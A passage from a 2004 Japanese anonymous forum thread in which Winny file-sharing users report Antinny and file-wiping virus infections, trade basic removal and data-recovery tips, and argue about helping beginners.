731 :[名無し]さん(bin+cue).rar:04/04/14 00:56 ID:GY9iUIRW
同意だな>>729

教える気がないなら余計な事書かなきゃ良いのに。
自分で調べろって言ってストレス発散してるのかな?安上がりだw
もしくは答える事も出来ないのかと…

調べて何となく分かっても、自信ない事ってあるよね。

732 :[名無し]さん(bin+cue).rar:04/04/14 00:57 ID:JRM18J+z
>>729
お前は一生初心者のまま

733 :[名無し]さん(bin+cue).rar:04/04/14 00:57 ID:JRM18J+z
>>731
お前も一生初心者のまま

734 :[名無し]さん(bin+cue).rar:04/04/14 00:59 ID:S0Yeinae
ナンバーズの予想アプリでやられますた_| ̄|○ il||li

735 :[名無し]さん(bin+cue).rar:04/04/14 01:01 ID:vu/1Tiij
>>734
とんだバクチだったな・・・(−人−)コンニチワ!

736 :[名無し]さん(bin+cue).rar:04/04/14 01:05 ID:0UJ4xSRL
>>729
う〜ん(ーー;)
とりあえずスマソ
いやとりあえず725の考え方には概ね賛成なのだが
一応俺も回答してるしね 回答した後もググったりして誘導しようと調べてはいる
だけどあまりにもちょっとってのが多すぎる
カキコする前に自分である程度調べる いろいろ試してみるってのは
最低限するべきだと思う
そうしないとその人はいつまで経っても初心者だしスキルも上昇しない
その人のためにならないと思う
特に723なんか過去ログ見てアクセス制限てなんだ?カキコして聞いてみよう
みたいな何も調べずカキコするのはおかしいと思うし間違ってると思う
まあ最近のこのレスの流れはひどいが
一応俺のレスは一種の楔ということでいかがか?


737 :[名無し]さん(bin+cue).rar:04/04/14 01:17 ID:yxMvV9sC
>>718
system32は?

738 :[名無し]さん(bin+cue).rar:04/04/14 01:35 ID:vu/1Tiij
私は>>725のほうを支持する
説教しつつちゃんと教えることは教えてるしね
初心者の成長を願うなら「自分で調べること」を教えるのが一番

>>729氏は子供の宿題の答えをまるまる教えるほうが
学力が上がるとでもお考えか?

739 :[名無し]さん(bin+cue).rar:04/04/14 01:44 ID:IboFNtTq
現在進行形でデスクトップ上のものが死んでいってます。

txtドキュメントはすべてガッAAに書き換えられますた。

はあ。俺の知識じゃ対応不可能。
とりあえずPC切ったほうがいいのかおしえて。
原因は不明。キンタマにはだいぶまえから感染済み


740 :[名無し]さん(bin+cue).rar:04/04/14 01:50 ID:CY9pBL+m
>>738
ふん、何が学力だか。
味噌糞一緒にして類推すべきことかどうかの
区別もつかんやつが何小賢しいこと言ってんだよ

このスレの利用者はお前らみたいに
ワガママな勝手を言うを馬鹿を教育してやる気はないとよ。

741 :[名無し]さん(bin+cue).rar:04/04/14 01:52 ID:Na2JbIMG
>>739
>キンタマにはだいぶまえから感染済み
ワロタ

742 :[名無し]さん(bin+cue).rar:04/04/14 01:54 ID:vu/1Tiij
とりあえず現在実行中のウィルスのプロセスを止めろ!!
Ctrl + Alt + Del でタスクマネージャ起動して
怪しげな(特にユーザー名が自分のヤツで覚えがないもの)を
「プロセスの終了」で殺せ!大至急だ!

それで書き換えがとまったらこのスレの1から嫁。健闘を祈る。

743 :[名無し]さん(bin+cue).rar:04/04/14 01:58 ID:V8mz9XhI
>>739
何もかも、手遅れ

最近の厨の質問は、面白くない。
マジレスするか釣かは、そのときの気分次第だな。
ベストとしては、教えることによって、自分も調べなきゃならなくて、それで
新しい知見が得られる場合だ。情けは人のためならず、昔の人もいいこと言ってるよ

744 :[名無し]さん(bin+cue).rar:04/04/14 02:02 ID:vu/1Tiij
>>729=740
       |
       |
   ぱくっ|
     /V\
    /◎;;;,;,,,,ヽ   そんなエサで
 _ ム::::(,,゚Д゚)::|    俺様が釣られると思ってんのか!!
ヽツ.(ノ:::::::::.:::::::.:..|)
  ヾソ:::::::::::::::::.:ノ 
   ` ー U'"U'     

 >>739の後処理は藻前に頼んだ!!(藁

 ああ、懇切丁寧に教えて差し上げるんだぞ、わかってるな?
       (有言実行♪ざんしょ?)

745 :[名無し]さん(bin+cue).rar:04/04/14 02:20 ID:CY9pBL+m
>>743
必死でそれらしい日本語を使おうとしてるがベースの日本語が不自由だな。
それが釣りなのか?ああ、そうかそうか、そういうことにしておいてやるよ。
















ほんと馬鹿だね、こいつ

746 :[名無し]さん(bin+cue).rar:04/04/14 02:20 ID:yE5yyzdz
Q.
>740
早く答えてくだあい!!おねまいします!!!!

A.
>740はお前らみたいにワガママな勝手を言うを馬鹿を教育してやる気はないとよ。

747 :[名無し]さん(bin+cue).rar:04/04/14 02:26 ID:0UJ4xSRL
>>739
いくらなんでもひどいねこりゃ
なぜもっと早くに対処しないかと こ(ry
>>742氏の追加説明
どれがどのプロセスかは
ttp://genji2.gooside.com/kidou.html
ttp://higaitaisaku.web.infoseek.co.jp/iru.html
以上のサイトでCtrl+Fで検索窓だしてプロセス名打ち込んで調べろ
>>146でレジストリのrunがいじられてないか調べて怪しいのを削除
でFA?誰か間違ってたら追加よろ 俺もちょっと調べてくるよ

>いやとりあえず725の考え方には
いやとりあえず729の考え方には
の間違い スマソ

748 :[名無し]さん(bin+cue).rar:04/04/14 02:30 ID:vu/1Tiij
>ほんと馬鹿だね、こいつ

そのまま>>740に返すYo〜ん つミω 
キミが噛み付きたいのは多分私だろう?私は>>744なのだが。

749 :[名無し]さん(bin+cue).rar:04/04/14 02:31 ID:pK1WnOd5
またドラクエ呪いテーマと一緒にHDDやられちゃった…
オートラン設定変えた後再起動してなかった…
修復ソフトで画像と音楽ファイルだけは救出するか…
つないであった外付けまでやられたYO…

750 :[名無し]さん(bin+cue).rar:04/04/14 02:39 ID:3S80EMgP
本来.exeがあるのはおかしいフォルダを検索して.exeが出たらスキルに自信が無きゃ黙って捨てろ

ってことでオッケー?

751 :[名無し]さん(bin+cue).rar:04/04/14 02:41 ID:3S80EMgP
ついでに
(一般コミック・雑誌) [荒川弘] 鋼の錬金術師 第35話.zip 11,667,324 0f45cb80362c8be4f86b26ffc75aeca4

antinny.msあり。

752 :[名無し]さん(bin+cue).rar:04/04/14 02:48 ID:V8mz9XhI
>>745
俺が 743 だ!
これでも、IT系技術雑誌とかに書いてるフリーライターだ!(ほんとか?)
スキルはあっても、金にならんことは書かないのが信条だ。(たぶんな)

釣られてほしくば(対処法を教えてほしいなら)、土下座とまでは言わないが、
もうちっと態度を改めよ、とかな。どうでもいいけど、>>750の姿勢が正しいと思うな。

753 :[名無し]さん(bin+cue).rar:04/04/14 02:53 ID:0UJ4xSRL
また間違えた
725=736=747だが 747の最後の訂正にアンカーつけ忘れ
>736を付け忘れた

で 739について調べたのだが多分OK 他のウィルスがいることがあるので↓
あとウィルスソフトはいれてるか?入れないのなら一度オンラインウィルススキャンしろ
ttp://www.trendmicro.co.jp/hcall/index.asp

一応これ以外の動作をするかもしれんので過去ログみて検討してみてくれ
あとどのファイル実行してそうなったのか覚えてないわな
スマソ

754 :[名無し]さん(bin+cue).rar:04/04/14 03:05 ID:WyAIG9WE
>>749
FinalData使う前にはちゃんとデフラグしとけよ

755 :[名無し]さん(bin+cue).rar:04/04/14 03:10 ID:pK1WnOd5
>>754
デフラグしたほうが復元率上がるんですか?
時間かかるから気が進まないんですけど…

756 :[名無し]さん(bin+cue).rar:04/04/14 03:14 ID:sUX4eE44
>>755
(´,_ゝ`)

757 :[名無し]さん(bin+cue).rar:04/04/14 03:21 ID:vu/1Tiij
>>755
げっ、やめんか!!だまされるんじゃない
修復前には何の作業もするな!鉄則だ。
ファイルがボロボロになって救えなくなるぞ

>>753
乙。島テクのスキャンも併用したほうがいい。今回トレンドは出遅れ気味。
http://security.symantec.com/SSCV6/jsdetect.asp?langid=jp&venid=sym&plfid=23&from=/sscv6/vc_scan.asp&pkj=IDTNBMRSJRFSKLUKUMX

結局教えねえと文句たれたヤシ誰もまともに教えんかったナ。
ま・いつものことだがね。(元ヘタレ開発者)ねるぽ。

758 :755:04/04/14 03:29 ID:pK1WnOd5
十分ほどデフラグしてしまった…
これってもうアウト…?

759 :[名無し]さん(bin+cue).rar:04/04/14 03:30 ID:r5d5aoFI
ドキュメントフォルダーのアチコチに知らん間に「ディスクトップ」とかかれたメモ帳が置いてあるんだが、これは何かの病気でしょうか?

760 :[名無し]さん(bin+cue).rar:04/04/14 03:31 ID:3S80EMgP
>>758
聞く前にぐぐろうよ。その辺はぐぐればあるんだから

761 :[名無し]さん(bin+cue).rar:04/04/14 03:34 ID:pK1WnOd5
>>760
了解です。
すいませんでした。

762 :[名無し]さん(bin+cue).rar:04/04/14 03:35 ID:sUX4eE44
>>758は釣り。
でなければ、真性の池沼

763 :[名無し]さん(bin+cue).rar:04/04/14 03:41 ID:aDj6Pl8t
クズだらけ

764 :759:04/04/14 03:42 ID:r5d5aoFI
本気で誰か助けて!!今朝までこんなメモ帳無かったのに。。
削除しようとしたらシステムが不安定になる恐れが…とか出るし(ノД`)
病気?病気なの?!?

765 :[名無し]さん(bin+cue).rar:04/04/14 03:49 ID:vu/1Tiij
・・・やっちゃった分に関しては・・・多分。(スマヌもちっと早く気づけば)

せめてこれで>>754にウサを晴らせ。
ジョークソフトの方はとっさに見つからなかったからw
 http://www.uni.ne.jp/jyu/present.html

これを機会にもちっと知識をつけましょう。PC常識の範囲です、多分・・・

>>759
 だーかーらー>>1から嫁ッ!!でなきゃ>>759が病院池。

766 :[名無し]さん(bin+cue).rar:04/04/14 03:50 ID:izbAmfMs
>>764
(・∀・)コンニチワ

767 :[名無し]さん(bin+cue).rar :04/04/14 04:40 ID:A1kUicyG
Run いって msconfig と入れスタートアップ確認したら何故か
一個変な物が入ってた。アイテムとコマンドは真っ白のブランク、ロケーションを見たら
SOFTWARE¥Microsoft¥Windows¥CurrentVersion¥Run
なのだがキタ━―━―━―(゚∀゚)━―━―━―!!なのかなのぉ
助言求む

768 :[名無し]さん(bin+cue).rar:04/04/14 04:49 ID:wPpTm/fj
>>767
それだけじゃよく分からないが 可能性としてはNetsky系ウイルス
(参照) ttp://www.sophos.co.jp/virusinfo/analyses/w32netskyg.html
漏れはそんなに詳しくないので、
一応オンラインスキャンでもどっかでやってみてくれ

769 :[名無し]さん(bin+cue).rar:04/04/14 05:45 ID:w+UgEya4
>>764

末期デツ


770 :[名無し]さん(bin+cue).rar:04/04/14 06:19 ID:Aik5g1dy
(アプリ)Downしたファイルを整理する支援nlpf002.zip mV12AU3TcX 104,353 cf3e19baf09e445ed509369fda98339a
ちょっと暇ができたので作ってみました。
・exeなどの実行可能ファイルを隔離する。
・exeなんかが含まれるzip、lzh、rarの書庫も隔離する。
・後は設定に従ってファイルを整理する。

771 :[名無し]さん(bin+cue).rar:04/04/14 06:25 ID:7Tyu2QO5
>>767
とりあえず、regeditで該当エントリ調べてみたら?

NECのノートだと、WelcomePadが空のエントリになってたような記憶が…。

772 :[名無し]さん(bin+cue).rar :04/04/14 07:40 ID:gEBXCz91
>>771,768
ありがとうございます
結果
W32.HLLW.Antinny.Gでした

773 :[名無し]さん(bin+cue).rar:04/04/14 07:59 ID:qwh6HgWV
もうね・・・

774 :[名無し]さん(bin+cue).rar :04/04/14 08:03 ID:gEBXCz91
と思ったらまだスタートアップの問題はきえてませんでした(ノд-。)クスン
何かほかのウイルスかワームですかね?

775 :[名無し]さん(bin+cue).rar:04/04/14 08:26 ID:k61AhZQi
>>774
システムの復元切り忘れてますたー テヘ とかいったら
   _, ,_  ベチコーン!
 (´・ω・`) _, ,_
   ⊂彡☆))Д´)  だぞ


「ファイル名を指定して実行」で msconfig と入力
スタートアップ タブで怪しげなブツ突き止めて処理すれ
怪しいかどうかはググれば大体わかるはず
単純なもんならスタートアップフォルダから削除すりゃ直る ったくよぉ

776 :[名無し]さん(bin+cue).rar:04/04/14 08:44 ID:ievJkRls
拡張子がrarだったのでダブルクリックしてしまいました
winrarが立ち上がって「ファイルが壊れてる」って出ましたが
バイナリエディタで覗いてみると頭がMZってなってました
これって実行ファイルってことですよね
自己解答書庫って可能性もありますが

これで感染しますか?




777 :[名無し]さん(bin+cue).rar:04/04/14 09:08 ID:PRQo8ZEI
>776
感染しない、といったら安心できるのかな? 実はうつっていたりしてな
自己解凍(伸張)アーカイブなら、拡張子は.exeとか

778 :724:04/04/14 09:32 ID:jydT0sG7
CドライブフォーマットしてXP入れ直しました。

ANTINYでキャッシュは消えたけど、まぁこれはこれでサッパリサッパリ(^_^;)


779 :[名無し]さん(bin+cue).rar:04/04/14 10:02 ID:ypc20yHJ
マイコンピュータからみるとCドラのディスクの空きが5G以上あるのに
デフラグすると使用可能領域が0%って言われた。
分析すると真っ赤だし。
先週かかったmsのせいかなぁ。
とりあえず再インスコしてるけど・・・・。

780 :[名無し]さん(bin+cue).rar:04/04/14 10:05 ID:LjWhTYGp
ゴミ箱空に汁

781 :779:04/04/14 11:19 ID:ypc20yHJ
いやそりゃゴミ箱ぐらいは見てますけどね。
しかもゴミ箱に5Gって・・・。

782 :[名無し]さん(bin+cue).rar:04/04/14 11:22 ID:/EoITb3f
システム復元の設定容量が大きいんじゃないのか?


783 :[名無し]さん(bin+cue).rar:04/04/14 11:35 ID:5EoCNuJs
5日前に、
勝手にキャッシュを消されてUPフォルダが出来ちゃうウイルスに
当たっちゃたんですが、
とりあえず、いろいろやったら(再インストはしてないです)
nyは復旧して今まで通りできるんですが
それ以降windous updateが出来なくなってしまいました。
updateすると、「ページを表示できません」となってしまいます。
どうもこの感染が原因ぽいのですが、
それについてなにか対応策はありますでしょうか?



784 :[名無し]さん(bin+cue).rar:04/04/14 11:38 ID:4go8TnoP

おまいらNyやってる場合じゃないですよ。
深刻度”最大”のセキュリティホールが見つかってますよ。
早くUpしなさい。

ttp://www.sponichi.co.jp/society/flash/20040414084336.html

785 :[名無し]さん(bin+cue).rar:04/04/14 11:39 ID:pGMBCPRS
>>748
>キミが噛み付きたいのは多分私だろう?

漫画の悪役にでもなったかのような口ぶりに爆笑しました。

786 :[名無し]さん(bin+cue).rar:04/04/14 11:41 ID:mQFASnN/
なんでANTINYじゃまぃてANTINNYなんだろ。
Nが重なってるのはどういうわけだ?

787 :[名無し]さん(bin+cue).rar:04/04/14 12:03 ID:pHPJOHnH
>>784
今はWindowsUpdate重たいね。。。

788 :[名無し]さん(bin+cue).rar:04/04/14 12:09 ID:IO+i0cEL
>>786
英語の法則だよ

789 :[名無し]さん(bin+cue).rar:04/04/14 12:37 ID:yVg+guPs
Antinny.ms(仮)の感染報告(WinXPにて) ほぼ>>528と同じ症状

Windowsフォルダにはsvchost.exeは作成されず。
UpFolder.txtが勝手に追記される。

Nortonのスキャンにて\Windows\system32\に
子ファイルのmscmsdrv.exe(248kB)がトロイの木馬として検出されるも親ファイルが検出されず。
親ファイルはmsdbg32.exe(282kB)で同じくsystem32フォルダにありました。

また\Windows\System32\Drivers\etc\のHostsファイルが書き換えられ
ウイルス対策ソフトの接続先他、WindowsUpdateなどにも接続できないようアドレスが0.0.0.0で書かれていました。

親ファイルはmsconfigにて
User Manager(製造先 不明)というサービスで起動されていました。

regeditでレジストリをみてみると
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\ および
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet002\Services\ および
HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ の3箇所に
WindowsUserManagerとしてキーがありました

やった対策は>>528のとおりです

もうNyはやりません。みなさんさようなら。

790 :789:04/04/14 12:40 ID:yVg+guPs
あと追加

感染中は子ファイルがプロセスで起動中です
まずそれを終了させるのが良いかと思われます

791 :[名無し]さん(bin+cue).rar:04/04/14 13:52 ID:c1PZbuWj
>>774
遅レスだが
レジストリの
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run

名前(規定) データ(値の設定なし)
てのは無いか?
これがあると、>>767 で書いてあるように
msconfigのスタートアップに空白項目が出来るが正常だ。

792 :厨房病院院長:04/04/14 14:07 ID:0DsKvuH5
いい加減ここ」厨房病院」のためにテンプレサイトをこしらえてはどうか?

793 :[名無し]さん(bin+cue).rar:04/04/14 14:10 ID:Zo9e25lq
スレも読めねえスレ内検索もできねぇバカはテンプレサイトも読めんのよ

794 :[名無し]さん(bin+cue).rar:04/04/14 14:12 ID:vi5cglhN
>>15
>>495
のプログラム喰らった…

ノートン体験版インストール時にやるチェックかましたけど消えてくれなかったので、
日付指定検索でそれらしいのを削除して、復元ポイントでレジストリ復元。
こりたのでレジストリいじってautorunを切って、再起動するついでにwindows updateで、まぁ、駆除は出来たが…

消されたファイルはHDD上から完全に消失してるわけ?
即効でリセット押して、再起動した瞬間にタスクマネで切ったから、それなりの被害ですんだけど…
やっぱり惜しい…

795 :[名無し]さん(bin+cue).rar:04/04/14 14:15 ID:0DsKvuH5
名言だな




792 :厨房病院院長 :04/04/14 14:07 ID:0DsKvuH5
いい加減ここ」厨房病院」のためにテンプレサイトをこしらえてはどうか?


793 :[名無し]さん(bin+cue).rar :04/04/14 14:10 ID:Zo9e25lq
スレも読めねえスレ内検索もできねぇバカはテンプレサイトも読めんのよ

796 :[名無し]さん(bin+cue).rar:04/04/14 14:19 ID:ccZw5W51
>>794
消された直後なら、復元ソフトなどで復活できる可能性が高い。
ただし、デフラグや消されたドライブに新しくファイルなどを置くと
消された領域に上書きされるので復活が難しくなる。

797 :[名無し]さん(bin+cue).rar:04/04/14 14:26 ID:Rrc59pRv
ウイルスもどんどん芸が細かくなってきてるな

798 :[名無し]さん(bin+cue).rar:04/04/14 14:31 ID:vi5cglhN
>>796
レス有難う。
「復元」で復元出来そうです。
パーティション区切っておいたおかげで、上書きの心配もなさそうです。

799 :[名無し]さん(bin+cue).rar:04/04/14 14:45 ID:JRM18J+z
795 名前:[名無し]さん(bin+cue).rar[] 投稿日:04/04/14 14:15 ID:0DsKvuH5
名言だな




792 :厨房病院院長 :04/04/14 14:07 ID:0DsKvuH5
いい加減ここ」厨房病院」のためにテンプレサイトをこしらえてはどうか?


793 :[名無し]さん(bin+cue).rar :04/04/14 14:10 ID:Zo9e25lq
スレも読めねえスレ内検索もできねぇバカはテンプレサイトも読めんのよ

800 :[名無し]さん(bin+cue).rar:04/04/14 15:00 ID:rx2Rw2f7
カギ括弧も正しく使えないいやつは
自作自演も満足に出来ない、ということか。

801 :[名無し]さん(bin+cue).rar:04/04/14 15:07 ID:Zo9e25lq
俺が自作自演に組み込まれてるのか?

802 :[名無し]さん(bin+cue).rar:04/04/14 15:10 ID:Y5jQESbM
>>801
おまいも社会の歯車です

803 :[名無し]さん(bin+cue).rar:04/04/14 15:14 ID:1tg64kux
>>794
タイトル教えれ

804 :[名無し]さん(bin+cue).rar:04/04/14 15:42 ID:zfbxqYzp
バスターやノートンってAntinny.msの対応はどうなの?
nodはAntinny.Jまで対応してるみたいだけど
バスターやノートンの情報はまだないみたいだから

805 :[名無し]さん(bin+cue).rar:04/04/14 15:44 ID:MXtQmR5a
>>804
感染者のような口ぶりですね。
ようこそ厨房病院へ!

806 :[名無し]さん(bin+cue).rar:04/04/14 16:02 ID:Y/fif7Og
偽装したexeファイル開いてしまった

「text. .exe」
みたいなの
orz

807 :[名無し]さん(bin+cue).rar:04/04/14 16:06 ID:Zo9e25lq
>>806
コンニチハ!!(・∀・)

808 :[名無し]さん(bin+cue).rar:04/04/14 16:07 ID:xQ0GpD/P
ちょいと聞きたいのですが、
UPフォルダ作成してなかったら晒しは受けないでつよね。


809 :[名無し]さん(bin+cue).rar:04/04/14 16:10 ID:ogO/WGGv
>>808
コンニチハ!!(・∀・)

810 :[名無し]さん(bin+cue).rar:04/04/14 16:12 ID:vYj963lV
>>808
関係なく晒す

811 :[名無し]さん(bin+cue).rar:04/04/14 16:12 ID:MXtQmR5a
とりあえずユーザ名教えろカス

812 :[名無し]さん(bin+cue).rar:04/04/14 16:13 ID:qnFRg32O
看護婦「次の方どうぞー」

厨房「はい」

医師「症状は何ですか?」

厨房「5日前に、勝手にキャッシュを消さ〜〜(省略)〜〜なってしまいます。
   nyは復旧して今まで通りできるんですが・・・・」

医師「ANTINYですね(いやwinny辞めろよカスが・・・)」

厨房「どうすれば直りますか?ノートンやバスターで治りますか?」

医師「過去レスは読みました?」

厨房「いいえ、何にも分かりません」

なんとか治療法を教え、解決に至ったものの3日後に再発する厨房であった

813 :[名無し]さん(bin+cue).rar:04/04/14 16:14 ID:Odtl7j+7
>>810
え、そうなの??

814 :[名無し]さん(bin+cue).rar:04/04/14 16:18 ID:diDNaPx9
すいません質問です。
今日、窓の手でシステムタブをクリックしたところ
登録情報のところに「Winnyで違法なファイルをダウンロードしています」
といったメッセージが勝手に記入されていました
これは、ウィルスなんでしょうか?

すごくこわいです。

815 :[名無し]さん(bin+cue).rar:04/04/14 16:20 ID:Zo9e25lq
登録情報ってOSの使用者名とかが書いてある欄か?
ウイルスに書き換えられたかもな

816 :[名無し]さん(bin+cue).rar:04/04/14 16:20 ID:Rrc59pRv
>>814
.exeをダブルクリックした記憶があるだろ?

817 :[名無し]さん(bin+cue).rar:04/04/14 16:21 ID:ccZw5W51
>>814
ビンゴ!

818 :[名無し]さん(bin+cue).rar:04/04/14 16:26 ID:qnFRg32O
罰金&執行猶予のレビューキボンヌ

819 :[名無し]さん(bin+cue).rar:04/04/14 16:31 ID:IuhrOtDK
ファイル詰め合わせしてる奴等って、ほんとにバカ剥き出しだな。
俺もやってるMMOのパスとかメモってるよ・・・

820 :814:04/04/14 16:52 ID:diDNaPx9
こんな感じです。
ウイルスバスターで検索してもウィルスは発見できませんでした
.exeをダブルクリックした記憶はあります。

http://uploader.org/normal/data/up5280.jpg

821 :帰ってきた晴れ女:04/04/14 16:55 ID:E4gDsjaC
やっと退院して帰ってきました。おひさです。
久方ぶりにパソ開いてメールチェックしたら・・・
ウイルスだらけ。
メアドはみんな違うんだけど、@の後ろ(ドメイン?)
が一緒なのね。
どこのプロバイダか調べてもわからない。
ウイルスチェックくらいしろよって感じです。
ちなみに
******@cellpro.jp
(*****は自粛ね)
セルプロってゆうプロバ。
何か怪しい感じがして怖い。

822 :[名無し]さん(bin+cue).rar:04/04/14 17:09 ID:5EoCNuJs
で?

823 :[名無し]さん(bin+cue).rar:04/04/14 17:19 ID:8yjZeYr9
>>821
板違い

セキュリティ
http://pc3.2ch.net/sec/

824 :[名無し]さん(bin+cue).rar:04/04/14 17:24 ID:T6gO1Jnz
>808
nyで今まで指定してあったうpフォルダに
晒しファイルが作られる可能性もある
つか俺がそうだったorz

825 :[名無し]さん(bin+cue).rar:04/04/14 17:25 ID:Cba6HWPZ
あのう。>>12で書かれているレジストリを変更した値を
元に戻したいのですが、どうすれば良いですか?
(デフォルトに戻したいのですが、元の値を忘れてしまったので、
値を教えて下さい。当方XPです。)

826 :794:04/04/14 17:35 ID:vi5cglhN
復旧完了!
多分、全部元通り!(なんか、足りないような気もするが…気のせいでしょ
データ復元自体は簡単だったが、ファイル構造の再現が大変だったよ…

>>803
タイトルって、ゲームの?
だったら、>>495と同じ奴だよ
今までウイルスなどの被害受けて無かったから、このスレチェックしてなかった…

827 :804:04/04/14 17:51 ID:zfbxqYzp
>>805
確かに感染者だけど再インストールして復旧してるんだが
どのファイルから感染したのか確認したいだけ
あとバスターとnod持っているのでどっち入れようか考え中
現状だとnod+kerioの方がいいとは思うんだけど。

828 :[名無し]さん(bin+cue).rar:04/04/14 18:29 ID:Bh/WawZu
>>814
コンニチハ!!(・∀・)


829 :[名無し]さん(bin+cue).rar:04/04/14 18:40 ID:b14D1lEb
昨日、とあるexeファイルがあったのでオンラインスキャンした。
   問題なかったので、踏んだ?こいつが犯人だったかは分からない。
本日、起動後HDDがノンストップ状態になる。
   おかしいと思って、再度オンラインスキャンしても問題なし。
   レジストリエディタを起動すると、なぜかワードが起動。
   全てのテキストファイルが「ぬるぽ・・・ガツ」に変わる。
   全てのワードファイルも「ぬるぽ・・・ガツ」に変わる。悲惨。
   必死こいてCDから起こしたmp3も、jpgも全部壊されてしまった。
   大損害ですよ・・・・はぁ・・・・

すでに報告されているものか分からないけど、何て奴なんでしょうか?

「こんにちわ」?って奴ですか?というより、「ぬるぽ」って感じなのですが。。。

830 :[名無し]さん(bin+cue).rar:04/04/14 18:44 ID:Rrc59pRv
>>829
人のパソコンでその.exeクリックしたいなー

831 :[名無し]さん(bin+cue).rar:04/04/14 18:46 ID:6sawQvuv
>>829
コンニチハ!!(・∀・)

832 :[名無し]さん(bin+cue).rar:04/04/14 18:47 ID:0UJ4xSRL
>>827
どのウィルスソフト使おうと使っている本人が気をつけなければ意味が無い
nyやる以上ほとんどが新しい(発売したて)ファイルをダウソする
ということはその中に新しいウィルス(対応してないファイル)があった場合
どのウィルスソフトでも対応できないわな
と いうことはやっぱり本人次第だね
ウィルスソフト入れようと入れまいと5個入れようと検知してくれるものはするし
してくれんものもあるわな
まあ既存のウィルスの対策に1つは最低入れとくべきだが



833 :[名無し]さん(bin+cue).rar:04/04/14 18:49 ID:Rrc59pRv
つーかもう.exeには触れないことにしろよ。

834 :sage:04/04/14 19:09 ID:j/BnZxvM
HD革命使ったらどうかな?

835 :[名無し]さん(bin+cue).rar:04/04/14 19:12 ID:6pPBi4Au
おれも.exe踏んでHDDまっさらにされて、
会社のやつらに馬鹿にされて凹んでたけど、
このスレ来るとほっとするなあ。

世の中馬鹿がいっぱいいて。

836 :[名無し]さん(bin+cue).rar:04/04/14 19:36 ID:oep+1ue4
俺も 829と同じやつにかかった

837 :[名無し]さん(bin+cue).rar:04/04/14 19:54 ID:oep+1ue4
829もやつなんなんですか?

838 :[名無し]さん(bin+cue).rar:04/04/14 19:55 ID:oep+1ue4
829のってなんなの?

839 :[名無し]さん(bin+cue).rar:04/04/14 20:22 ID:hNPRamWC
829のやつ、おれも食らいました。
txt、lzh、zip、mp3、jepg、dll、あとエクセルとかのファイル
全部ぬるぽののテキストファイルに書き換えられるのね…。
大損害ですわ…。

840 :[名無し]さん(bin+cue).rar:04/04/14 20:24 ID:IfbPGzKX
なんで皆、重要なデータを別のHDDに保存しとかないの?

1Gb辺りの単価もHDDのがDVDロムより安いし焼き速度(転送速度)最速。
今は160GbのHDDがメディアだって知らないのかな。

841 :[名無し]さん(bin+cue).rar:04/04/14 20:30 ID:ud4RM5t9
>>840
別にHDD増設ってそんなにすごいことじゃないからね

842 :[名無し]さん(bin+cue).rar:04/04/14 20:31 ID:Rrc59pRv
別に重要なデータなんてないんだろ。

843 :[名無し]さん(bin+cue).rar:04/04/14 20:59 ID:Z6dF211Y
増設じゃなくてメディアとして扱うことを言ってるんだけど。
そのほうが安くて早いし一枚あたりに入る容量が段違い。

844 :[名無し]さん(bin+cue).rar:04/04/14 21:12 ID:/njiO5w8
>>843
そんな大量のデータ保存するものね〜よ。
すぐ捨てるわボケ

845 :[名無し]さん(bin+cue).rar:04/04/14 21:17 ID:kx87TP+p
ディブエックソ5.1レジストパッチ.exeとやらを踏んでHDDまっさらになりますた
一瞬DOS窓出たあと、HDDがガリガリ言うのでタスクマネージャでそれらしき
プログラムを停止。半分くらいファイルが消えてました。
ところがOS再起動後、またそれが起動したらしくほぼ全消し状態(フォルダは全て残ってた)
再起動前にレジストリやini、upフォルダを確認しても異常は無かったです
829のもそうだけどなんかDOSコマンドっぽい動き

とりあえずキレイになったHDDにLinux入れる予定

846 :[名無し]さん(bin+cue).rar:04/04/14 21:18 ID:6OCnhJ3F
分かりやすく説明してあげようよ。
ほらあれだ。同じエロ動画で1年もおかずに出来ないだろう?
そういうことさ。

847 :[名無し]さん(bin+cue).rar:04/04/14 21:31 ID:Z6dF211Y
メディアに焼かない派か。

848 :[名無し]さん(bin+cue).rar:04/04/14 21:33 ID:YUiJkXPa
>>764と同じなのか漏れもいつの間にか『Desktop』ってメモ帳がドキュメントにあるぞ!!
マジでコンニチワなのか?!で末期なのかぁあぁぁ?!?!
今までそんな症状にかかった香具師はいるか?1見て調べたんだがワカラン・・・る。
誰か教えてエロイ人m(._.。)m オネガイ

849 :[名無し]さん(bin+cue).rar:04/04/14 21:37 ID:0UJ4xSRL
>>845
多分偽装してたのを見逃したのだと思う
そうじゃないと再起動後にまた起動しないと思われ

ちょっと思たが>>146のレジストリキーにこれもいるんじゃないか?

HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run

間違ってたらスマソ

850 :[名無し]さん(bin+cue).rar:04/04/14 21:45 ID:psrElmSh
いいか、えたいの知れないexeは踏むな
どうしても踏みたい時は神に祈れ

851 :[名無し]さん(bin+cue).rar:04/04/14 21:46 ID:2/uK8qhZ
Antinny.msに感染してしまいました。

>親のファイル名が含まれるレジストリキーを削除。
>HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\ 内にある。

親のファイル名が含まれているものがどれだか分かりません。
感染ファイルは、msoeaccts.exe(247k)とmsrd3x.exe(281k)でした。

どなたかお知恵を貸していただけないでしょうか。お願いします。

852 :[名無し]さん(bin+cue).rar:04/04/14 21:47 ID:S/OcWE0J
今日犬のウンコ踏んじまった・・・

853 :[名無し]さん(bin+cue).rar:04/04/14 21:50 ID:0UJ4xSRL
>>849
俺は最近踏んだことが無いからよくわからないのだが
一応以下のリンク先のことをやって怪しいプロセスを探して止める
で 止めたプロセスをリストアップしてそのファイルを消す
(ただし 自己責任で)
話はそれからだな うまくいけばこれでウィルスの活動は止まるが下手すると
起動しなくなるから気をつけて 一応重要ファイルの避難をお勧めする

>>742 >>747 >>753 >>757

それが無理なら素直に再セットアップをお勧めする

854 :[名無し]さん(bin+cue).rar:04/04/14 21:51 ID:PRQo8ZEI
得体の知れない.exeは、ウイルスかもしれないし、ワームかもしれない
ウイルスチェックかけても、HDD全消しのような単純なツールは
チェックに引っかからない。バックドアを仕掛けるとか、不正なコールルーチンが
あるとか、見ているところが違うからね。とにかく踏むな。

855 :853:04/04/14 21:52 ID:0UJ4xSRL
素でアンカー間違えた 自分にレスしてどうする
>>848

俺は昨日からなにやってるんだか_| ̄|○

